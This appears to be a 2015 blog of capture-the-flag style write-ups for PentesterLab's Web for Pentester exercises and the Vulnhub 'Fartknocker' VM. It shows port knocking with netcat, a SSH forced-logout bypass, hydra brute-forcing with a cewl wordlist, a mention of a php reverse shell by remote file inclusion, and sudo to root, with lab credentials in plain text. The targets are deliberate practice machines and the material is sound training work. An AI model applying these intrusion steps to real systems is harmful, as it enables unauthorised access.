Saturday, 30 May 2015

Web for Pentester - File Inclusion

There are two types of File inclusion
Local and Remote

Example 1.

Below is an example of Local File Inclusion, Remote is also an option, however i will cover that in Example 2.

Example 2.

I decided to use a Pentest Monkey`s php reverse shell 

after a quick edit, it was good to go.

I used pythons inbuilt simplehttpserver hosting the script on my machine, and setup a simple netcat listener for it to connect back to.


Remote File Include, a php-reverse-shell which connected back to my netcat listener.

I wont cover escalating, that is for another day.
For now a foothold will suffice  =)

Thanks for reading.

Web for Pentester - Directory Traversal

There are 3 Examples to complete.

Viewing the Source shows these better.

1. No real issues.

2. A different approach, as the first method didnt work.


3. This was much harder, after trying a few options, i decided to employ DotDotPwn to find it.

 perl -m http-url -h -u -o unix -b -k root

Now to test it in a browser.

Further Reading can be found here:

Thanks for reading.

Web for Pentester VM - Pentesterlab

Web for Pentester


Pentesterlab Course link

This VM is a very nice collection of the different web vulnerabilities.


 The Pre-write up bit

Note: I dont do any of this for a living, and I dont claim to be all knowing.


Any finding`s will be very brief, and sometimes incomplete.

And of course, its gonna be back to front.

I`ll decide on formatting it later on, but at the moment, i cant be bothered =)


Directory Traversal 

Thursday, 7 May 2015

Thursday, 16 April 2015

TopHatSec - Fartknocker VM - Hosted on Vulnhub


arp gives:


Address                  HWtype  HWaddress           Flags Mask            Iface           ether   08:00:27:91:bc:58   C                     vboxnet0



Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker
Nmap scan report for
Host is up (0.0012s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

1   1.18 ms

OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds

The scan shows a webserver running



- Nikto v2.1.5/2.1.5
+ Target Host:
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ -3233: GET /icons/README: /icons/README: Apache default file found


Not much from that.......

So i decided to visit the page with a browser

The link Wooah gives pcap1.pcap

Opening it up with Wireshark, gives allot of ICMP flying back and fourth, however lower down something is happening.

TCP Ports 7000, 8000, 9000 and 8888 are used.

I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place)

Given my python abilities are... basic to say the least, i knocked up a simple bash script utilising netcat

nc -v 7000
nc -v 8000
nc -v 9000
nc -v 8888

After a few frustrating attempts, it finally worked!


nc: connect to port 7000 (tcp) failed: Connection refused
nc: connect to port 8000 (tcp) failed: Connection refused
nc: connect to port 9000 (tcp) failed: Connection refused
Connection to 8888 port [tcp/*] succeeded!


Visiting the site with a browser gives:

The link gives another pcap file, pcap2.pcap.


Wireshark shows some more ICMP and ARP traffic.
however more connections are established, to different ports

Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.

So i probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.

[-] Scanning with Nmap, this could take a minute...go get some coffee

[-] Sending default knockd sequence to

[-] Scanning again...too soon for more coffee???

[+] 1 new port(s) opened...
(1337, 'tcp')

Writing to output file - outfile.txt

it showed port 1337  was now open

nc -vv 1337
Connection to 1337 port [tcp/*] succeeded!

No Pcap file this time though, however "all about that base" was a clue

 echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt

base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666

Another knocking sequence, so i returned to my bash script method.

nc -v 8888
nc -v 9999
nc -v 7777
nc -v 6666
nc -v 22

nc: connect to port 8888 (tcp) failed: Connection refused
nc: connect to port 9999 (tcp) failed: Connection refused
nc: connect to port 7777 (tcp) failed: Connection refused
nc: connect to port 6666 (tcp) failed: Connection refused
Connection to 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2

Port 22 is not open, nice one!

# CONGRATS! YOU HAVE OPENED THE SSH SERVER                            #
# USERNAME: butthead                                                                              #
# PASSWORD: nachosrule                                                                           #

However this was not to be as smooth as i initally thought..

butthead@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 15:01:54 2015 from
You are only logging in for a split second! What do you do!
Connection to closed.


A little digging in the man pages of ssh i stumbled across it


     ssh — OpenSSH SSH client (remote login program)

     ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
         [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
         [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
         [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
         [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]

ssh -l butthead /bin/bash
butthead@'s password:

 After a few seconds waiting thinking i gave the "ls" command

uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.

Can you login as beavis or root ?

this was another hint..

cat /etc/passwd | grep beavis

I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.

 After no luck using conventional wordlists I used cewl to generate my own from a wikipedia page on Beavis and Butthead

[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host:   login: beavis   password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2015-04-12 22:08:18

 Hydra had found a valid password for the user "beavis"

Logging in....

beavis@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 17:07:32 2015 from

It was starting to go very well, time to start looking for ways to obtain root...

beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 

Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL

A quick check of id shows beavis is : groups 27(sudo)  and can commands ( ALL : ALL ) ALL

beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!




Thanks to everyone at Vulnhub for the guidance over the time ive been there.

Special Thanks To Tophatsec for creating this challenge.